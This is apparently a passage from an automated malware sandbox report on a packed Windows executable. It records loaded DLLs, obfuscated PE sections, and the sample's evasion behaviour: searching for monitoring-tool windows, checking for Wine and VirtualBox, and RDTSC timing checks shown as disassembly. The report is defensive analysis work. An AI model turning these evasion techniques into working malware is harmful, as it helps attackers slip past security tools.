                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: file.exeStatic file information: File size 1895424 > 1048576
                Source: file.exeStatic PE information: Raw size of xyjapqsh is bigger than: 0x100000 < 0x1a6c00

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xyjapqsh:EW;fjnsenoe:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xyjapqsh:EW;fjnsenoe:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1de5a6 should be: 0x1de476
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: xyjapqsh
                Source: file.exeStatic PE information: section name: fjnsenoe
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA92DC push 6E698301h; mov dword ptr [esp], esi0_2_00CA9E4B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA80CB push 4501FEACh; mov dword ptr [esp], edx0_2_00CA9184
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA80CB push 6E698301h; mov dword ptr [esp], esi0_2_00CA9E4B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA80CB push ecx; mov dword ptr [esp], eax0_2_00CA9EEE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB40D4 push ebp; mov dword ptr [esp], ecx0_2_00DB45F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB40D4 push eax; mov dword ptr [esp], ecx0_2_00DB463A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB40D4 push 321E79D0h; mov dword ptr [esp], edi0_2_00DB470E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB40D4 push 43461CBBh; mov dword ptr [esp], eax0_2_00DB477C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB40D4 push 380B79A4h; mov dword ptr [esp], ebx0_2_00DB4799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB40D4 push ebx; mov dword ptr [esp], edi0_2_00DB47C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB40D4 push eax; mov dword ptr [esp], 00000000h0_2_00DB47E2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB40D4 push ebx; mov dword ptr [esp], eax0_2_00DB47FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB40D4 push 10D2F6F3h; mov dword ptr [esp], eax0_2_00DB4821
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE40D6 push 6A1A3047h; mov dword ptr [esp], edx0_2_00CE4479
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE40D6 push 49415445h; mov dword ptr [esp], eax0_2_00CE44CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE40D6 push 32671A53h; mov dword ptr [esp], edi0_2_00CE4511
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE40D6 push edi; mov dword ptr [esp], edx0_2_00CE4539
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE40D6 push 423F8820h; mov dword ptr [esp], edx0_2_00CE456A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE40D6 push 1F83E159h; mov dword ptr [esp], edx0_2_00CE4575
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE40D6 push ebp; mov dword ptr [esp], ebx0_2_00CE4623
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE40D6 push ecx; mov dword ptr [esp], edi0_2_00CE4666
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E340D7 push ecx; mov dword ptr [esp], edx0_2_00E340E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E340D7 push ebp; mov dword ptr [esp], ecx0_2_00E34170
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2E0A5 push 2FFAD9BCh; mov dword ptr [esp], ecx0_2_00E2E0ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9608A push edx; mov dword ptr [esp], 5F04894Dh0_2_00D96607
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9608A push esi; mov dword ptr [esp], ebx0_2_00D96615
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9608A push 46F1CDCBh; mov dword ptr [esp], edx0_2_00D966A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9608A push ebp; mov dword ptr [esp], esi0_2_00D966DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9608A push 786C76A7h; mov dword ptr [esp], ebp0_2_00D966FC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9608A push 7552DA3Ch; mov dword ptr [esp], edx0_2_00D96744
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9608A push edi; mov dword ptr [esp], ebx0_2_00D96792
                Source: file.exeStatic PE information: section name: entropy: 7.97823310420282
                Source: file.exeStatic PE information: section name: xyjapqsh entropy: 7.953197683807969

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA90B1 second address: CA90D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA90D2 second address: CA90D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E281F3 second address: E281F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E281F9 second address: E28201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2D3C1 second address: E2D3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F450CC4A606h 0x0000000c popad 0x0000000d jmp 00007F450CC4A60Fh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30954 second address: E30963 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F450CC4AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30A20 second address: E30A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30A24 second address: E30A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30A2A second address: E30A51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A618h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jo 00007F450CC4A60Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30A51 second address: E30A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F450CC4AB1Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30A5D second address: E30ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jmp 00007F450CC4A618h 0x0000000e pop eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F450CC4A608h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 jg 00007F450CC4A60Bh 0x0000002f lea ebx, dword ptr [ebp+1245B889h] 0x00000035 xchg eax, ebx 0x00000036 jmp 00007F450CC4A616h 0x0000003b push eax 0x0000003c push edi 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30ACD second address: E30AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30B70 second address: E30B95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A617h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30B95 second address: E30BAB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F450CC4AB1Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30BAB second address: E30C6B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b je 00007F450CC4A618h 0x00000011 pop eax 0x00000012 mov esi, dword ptr [ebp+122D29A5h] 0x00000018 mov edi, dword ptr [ebp+122D28A9h] 0x0000001e push 00000003h 0x00000020 mov ecx, dword ptr [ebp+122D2A75h] 0x00000026 mov dword ptr [ebp+122D1C03h], edi 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D2E22h], edi 0x00000034 push 00000003h 0x00000036 clc 0x00000037 push BF73C288h 0x0000003c jmp 00007F450CC4A610h 0x00000041 add dword ptr [esp], 008C3D78h 0x00000048 push 00000000h 0x0000004a push edi 0x0000004b call 00007F450CC4A608h 0x00000050 pop edi 0x00000051 mov dword ptr [esp+04h], edi 0x00000055 add dword ptr [esp+04h], 0000001Dh 0x0000005d inc edi 0x0000005e push edi 0x0000005f ret 0x00000060 pop edi 0x00000061 ret 0x00000062 lea ebx, dword ptr [ebp+1245B892h] 0x00000068 mov edx, 02DDB43Ah 0x0000006d xchg eax, ebx 0x0000006e push edi 0x0000006f jl 00007F450CC4A618h 0x00000075 jmp 00007F450CC4A612h 0x0000007a pop edi 0x0000007b push eax 0x0000007c jng 00007F450CC4A614h 0x00000082 pushad 0x00000083 jg 00007F450CC4A606h 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30D05 second address: E30D2D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F450CC4AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, D5E0h 0x00000012 push 00000000h 0x00000014 mov esi, dword ptr [ebp+122D2AF9h] 0x0000001a call 00007F450CC4AB19h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 pop esi 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30D2D second address: E30D36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30D36 second address: E30D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F450CC4AB16h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F450CC4AB24h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edi 0x00000017 jc 00007F450CC4AB24h 0x0000001d jmp 00007F450CC4AB1Eh 0x00000022 pop edi 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30D78 second address: E30D86 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F450CC4A606h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4EC84 second address: E4EC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F450CC4AB16h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4EC8F second address: E4EC94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4EC94 second address: E4EC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F243 second address: E4F273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F450CC4A617h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 jng 00007F450CC4A612h 0x00000016 jo 00007F450CC4A606h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F273 second address: E4F292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F450CC4AB1Bh 0x0000000b jmp 00007F450CC4AB1Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F411 second address: E4F41D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F450CC4A606h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F56D second address: E4F573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F573 second address: E4F5B1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F450CC4A606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jo 00007F450CC4A606h 0x00000016 jmp 00007F450CC4A60Dh 0x0000001b jmp 00007F450CC4A615h 0x00000020 popad 0x00000021 pushad 0x00000022 push edx 0x00000023 pop edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F727 second address: E4F72D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F8AF second address: E4F8C2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F450CC4A608h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F8C2 second address: E4F8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F450CC4AB16h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1AA3F second address: E1AA48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1AA48 second address: E1AA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1AA4D second address: E1AA75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4A60Eh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50578 second address: E5059E instructions: 0x00000000 rdtsc 0x00000002 js 00007F450CC4AB1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F450CC4AB24h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5059E second address: E505A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E505A2 second address: E505E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F450CC4AB1Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d ja 00007F450CC4AB48h 0x00000013 jmp 00007F450CC4AB1Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F450CC4AB26h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E505E0 second address: E505EA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F450CC4A606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E50C9F second address: E50CBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB27h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5AE1D second address: E5AE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jnc 00007F450CC4A606h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B115 second address: E5B11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B11A second address: E5B152 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F450CC4A623h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c jp 00007F450CC4A606h 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B152 second address: E5B156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B2A3 second address: E5B2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5B2A9 second address: E5B2C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4AB1Bh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D11E second address: E5D124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D124 second address: E5D128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D773 second address: E5D777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D859 second address: E5D85D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D94F second address: E5D973 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4A619h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5D9E3 second address: E5DA03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F450CC4AB1Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5EB2F second address: E5EB60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4A617h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5EB60 second address: E5EBF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F450CC4AB18h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 movsx edi, si 0x00000028 mov edi, dword ptr [ebp+122D1B19h] 0x0000002e push 00000000h 0x00000030 and edi, dword ptr [ebp+122D2969h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007F450CC4AB18h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 00000018h 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 mov esi, dword ptr [ebp+122D26D0h] 0x00000058 mov esi, dword ptr [ebp+122D29D5h] 0x0000005e xchg eax, ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F450CC4AB26h 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E5FC65 second address: E5FCBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007F450CC4A61Ah 0x0000000b popad 0x0000000c nop 0x0000000d pushad 0x0000000e mov eax, dword ptr [ebp+1247F65Bh] 0x00000014 sub edx, dword ptr [ebp+122D3219h] 0x0000001a popad 0x0000001b push 00000000h 0x0000001d mov di, dx 0x00000020 push 00000000h 0x00000022 jl 00007F450CC4A60Ch 0x00000028 jmp 00007F450CC4A60Fh 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edi 0x00000032 pop edi 0x00000033 pop eax 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60462 second address: E60481 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F450CC4AB25h 0x00000008 jmp 00007F450CC4AB1Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61C42 second address: E61C48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60F9A second address: E60F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E61C48 second address: E61C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A612h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E60F9E second address: E60FAC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F450CC4AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
